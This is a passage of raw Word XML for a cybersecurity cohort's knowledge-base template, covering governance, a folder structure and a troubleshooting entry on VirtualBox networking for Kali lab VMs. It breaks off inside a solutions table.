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3D9D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARTIFACT 3: COLLABORATIVE KNOWLEDGE BASE (Detailed Template)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C04ADD8" w14:textId="519FDD6A" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="0071479B" w:rsidP="00807D52">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Shimanni Alfred Tlo</w:t>
      </w:r>
      <w:r w:rsidR="00F47F44">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>kotsi</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> - Cybersecurity Cohort Knowledge Base</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version:</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:t> 1.2 | </w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Last Updated:</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00F47F44">
        <w:t>03 December 20</w:t>
      </w:r>
      <w:r w:rsidR="005C3DE0">
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Access:</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="000176B9" w:rsidRPr="007552B3">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/justalfred2016/CyberSecurityCohort.git</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7A8DE9F8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 1: INTRODUCTION &amp; GOVERNANCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3155B945" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.1 Purpose Statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:br/>
        <w:t>This knowledge base serves as the central repository for collective intelligence, troubleshooting guides, methodology documentation, and institutional memory for the Advanced Penetration Testing Cohort. Its primary objectives are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B14E61" w14:textId="20C86D4B" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="0008081D" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Reducing</w:t>
      </w:r>
      <w:r w:rsidR="00807D52" w:rsidRPr="00807D52">
        <w:t xml:space="preserve"> redundant problem-solving by documenting solutions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D18AF8F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>To standardize methodologies across the team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6713F65C" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>To accelerate onboarding for new members (future cohorts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DF198B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>To create reusable assets for professional portfolios</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E38F1D" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.2 Maintenance Protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6060E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ownership:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> [Your Name] as Knowledge Manager, with contributions from all members</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D531B9A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Update Frequency:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Continuous, with formal review each Friday</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7856DEF3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Version Control:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Managed via GitHub with change tracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B401CB" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Quality Assurance:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> Peer review required for new entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB5A9C8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Retention Policy:</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> All entries retained, with archival after 1 year of inactivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473F19C0" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1.3 Structure &amp; Navigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACBA826" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FEABFF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>Knowledge Base/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32192895" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"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01-Troubleshooting/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A36B8E5" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">│   </w:t>
      </w:r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Lab-Setup/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FD7B8" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">│   </w:t>
      </w:r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Tool-Issues/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3A655" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>│   └── Network-Problems/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6370C15A" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"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02-Methodology/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B6758E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">│   </w:t>
      </w:r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Reconnaissance/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC8BCF3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">│   </w:t>
      </w:r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Scanning/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09059391" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">│   </w:t>
      </w:r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Exploitation/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FADA9F" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>│   └── Reporting/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1E165" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"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03-Tools-Reference/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2450E584" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">│   </w:t>
      </w:r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Nmap/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81BC50" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">│   </w:t>
      </w:r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Metasploit/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62222E37" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>│   └── Custom-Scripts/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5453D610" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52"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04-Cheat-Sheets/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F47F4BD" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>──</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve"> 05-Case-Studies/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7684B0BA" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>└── 06-Team-Directory/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7CC701" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>SECTION 2: TROUBLESHOOTING GUIDES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CEB5FE2" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.1 Lab Setup &amp; Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCA37DE" w14:textId="540ED8CD" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Issue: "Kali Linux VM cannot ping target VMs"</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Last Updated: </w:t>
      </w:r>
      <w:r w:rsidR="00BF0006">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>17 November 2025</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Contributor: </w:t>
      </w:r>
      <w:r w:rsidR="00BF0006">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Njabulo Tshuma</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Verified: </w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE2687" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Symptoms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A8CB94" w14:textId="56860747" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t xml:space="preserve">ping </w:t>
      </w:r>
      <w:r w:rsidR="00867CDB">
        <w:t>192.168.4.</w:t>
      </w:r>
      <w:r w:rsidR="00854FAD">
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidRPr="00807D52">
        <w:t> returns "Destination Host Unreachable"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D96D1FF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>ifconfig shows no IP address or wrong subnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E02E667" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Network adapter shows "Cable Unconnected" in VirtualBox</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204DAAD4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Diagnostic Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9F3D56" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Check virtual network settings:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E010089" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277E37A7" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># In VirtualBox main window:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3029B7C4" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># 1. Select VM → Settings → Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7BB996" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># 2. Adapter 1 should be "Attached to: NAT Network"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648B9219" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># 3. All VMs must use SAME NAT Network name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970A46B" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:lastRenderedPageBreak/>
        <w:t>Verify IP assignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516086D2" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F20F9FB" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># In Kali terminal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F230E44" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo dhclient -v</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE718BF" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>ip addr show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AD539E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># Should show IP in 10.0.2.x range for NAT Network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6DB488" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:t>Check firewall settings (temporarily for lab):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B3A0F9" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33332296" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t># On target VMs (if applicable):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC29BD3" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo systemctl stop firewalld  # CentOS/RHEL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E0C480" w14:textId="77777777" w:rsidR="00807D52" w:rsidRPr="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:r w:rsidRPr="00807D52">
        <w:t>sudo ufw disable              # Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DF039E" w14:textId="77777777" w:rsidR="00807D52" w:rsidRDefault="00807D52" w:rsidP="00807D52">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00807D52">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Solution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13D84" w14:paraId="1C097182" w14:textId="77777777" w:rsidTr="00413D84">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33738AEA" w14:textId="22248B3C" w:rsidR="00413D84" w:rsidRDefault="00413D84" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>Problem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72A51457" w14:textId="1B30637F" w:rsidR="00413D84" w:rsidRDefault="00413D84" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>Solution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="420A3113" w14:textId="51F6695B" w:rsidR="00413D84" w:rsidRDefault="006320D8" w:rsidP="00807D52">
            <w:r>
              <w:t>Success Rate</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413D84" w14:paraId="11DB32B5" w14:textId="77777777" w:rsidTr="00413D84">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31544645" w14:textId="3CA5169A" w:rsidR="00413D84" w:rsidRDefault="005A7254" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>Wrong network mode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="091887D5" w14:textId="08143FA7" w:rsidR="00413D84" w:rsidRDefault="005E1B62" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>Change to "NAT Network" for ALL VMs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D1FA3CA" w14:textId="2C27E5F4" w:rsidR="00413D84" w:rsidRDefault="005E1B62" w:rsidP="00807D52">
            <w:r>
              <w:t>100%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413D84" w14:paraId="69E7DD54" w14:textId="77777777" w:rsidTr="00413D84">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="213517AE" w14:textId="3FC4621F" w:rsidR="00413D84" w:rsidRDefault="00570F7C" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>DHCP not working</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0CDA4475" w14:textId="0610F38B" w:rsidR="00413D84" w:rsidRDefault="00570F7C" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>Manual IP assignment in same subnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C80F29B" w14:textId="3B9FA322" w:rsidR="00413D84" w:rsidRDefault="00624E2F" w:rsidP="00807D52">
            <w:r>
              <w:t>95%</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00413D84" w14:paraId="7E8E7A0B" w14:textId="77777777" w:rsidTr="00413D84">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3116" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F22C21E" w14:textId="1CB8A575" w:rsidR="00413D84" w:rsidRDefault="001E64FD" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>Host firewall blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="737DFA99" w14:textId="2DAA8D3E" w:rsidR="00413D84" w:rsidRDefault="001E64FD" w:rsidP="00807D52">
            <w:r w:rsidRPr="00807D52">
              <w:t>Add VirtualBox to firewall exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3117" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4303A99B" w14:textId="34065EB8" w:rsidR="00413D84" w:rsidRDefault="001E64FD" w:rsidP="00807D52">
            <w:r>
              <w:t>90</w:t>
            </w:r>
            <w:r w:rsidR="00D136A6">
              <w:t>%</w:t>
            </w:r>
          </w:p>
